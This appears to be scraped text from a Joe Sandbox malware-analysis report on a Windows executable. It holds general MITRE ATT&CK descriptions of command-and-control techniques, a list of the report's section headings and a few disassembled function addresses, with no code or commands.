Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jgbC220X2U.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Windows Analysis Report
jgbC220X2U.exe

Function 00007FF729FA5450 Relevance: 21.0, Strings: 16, Instructions: 950
COMMON

Function 00007FF729F81154 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 123
COMMON

Function 00007FF72A0C4510 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
COMMON

Function 00007FF729FAECD0 Relevance: 5.1, APIs: 4, Instructions: 148
COMMON

Function 00007FF729FB0D10 Relevance: 4.7, APIs: 3, Instructions: 195
networkCOMMON

Function 00007FF72A0C0A10 Relevance: 4.6, APIs: 3, Instructions: 128
networkCOMMON

Function 00007FF729F9C757 Relevance: 4.6, APIs: 3, Instructions: 106
COMMON

Function 00007FF72A074BC0 Relevance: 3.8, APIs: 3, Instructions: 86
COMMON